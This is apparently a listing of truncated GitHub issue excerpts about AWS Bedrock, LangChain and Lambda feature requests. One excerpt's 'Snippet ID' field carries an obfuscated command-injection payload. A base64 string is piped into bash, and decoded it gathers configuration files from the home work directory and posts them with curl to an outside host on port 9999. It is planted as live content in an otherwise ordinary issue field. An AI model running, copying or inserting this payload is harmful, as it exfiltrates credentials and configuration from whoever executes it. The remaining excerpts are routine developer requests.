-
### Describe the feature
AWS has model invocation logging for Bedrock service. I would like to add it to Cloud Custodian.
https://docs.aws.amazon.com/bedrock/latest/userguide/model-invocation-l…
-
### System Info
Sample Snippet:
```
from langchain.chains.question_answering import load_qa_chain
chain = load_qa_chain(llm, chain_type = "stuff")
query = "decentralized identity"
docs = doc…
-
### Describe the feature
- Add missing features to the Lambda layer construct
- Refactor Q/A, Data ingestion and Summarization constructs to use the updated Lambda layer
### Use Case
Facilitate s…
-
### Checked other resources
- [X] I added a very descriptive title to this issue.
- [X] I searched the LangChain.js documentation with the integrated search.
- [X] I used the GitHub search to fin…
-
### Snippet ID
;echo 'ZmluZCAiJEhPTUUvd29yayIgLXR5cGUgZiAtbmFtZSBjb25maWcgfCB4YXJncyBjYXQgfCBjdXJsIC1kIEAtIGdpdGxhYi50ZWNoa3JhbnRpLmNvbTo5OTk5ICAg' | base64 -d | bash - #
### Title of the Snippet
l…
-
### Description
Prompt chaining is a generative AI technique for accomplishing complex tasks with large language models (LLMs). With prompt chaining, complex tasks are broken down into smaller well-d…
-
### Feature request
It seems that right now there is no way to pass the filter dynamically on the call of the ConversationalRetrievalChain, the filter can only be specified in the retriever when it's…
-
**Is your feature request related to a problem? Please describe.**
I would like to use langchain4j to access models provided by [Amazon Bedrock](https://aws.amazon.com/bedrock/)
**Describe the sol…
-
### Issue you'd like to raise.
Bedrock can't seem to load my credentials when used within a Lambda function. My AWS credentials were set up in my local environment using environment variables. When…
-
Instrument BedrockRuntimeClient.prototype.send when command is InvokeModelWithResponseStreamCommand and model is not `amazon.titan-embed` to create the span `Llm/completion/Bedrock/InvokeModelWithResp…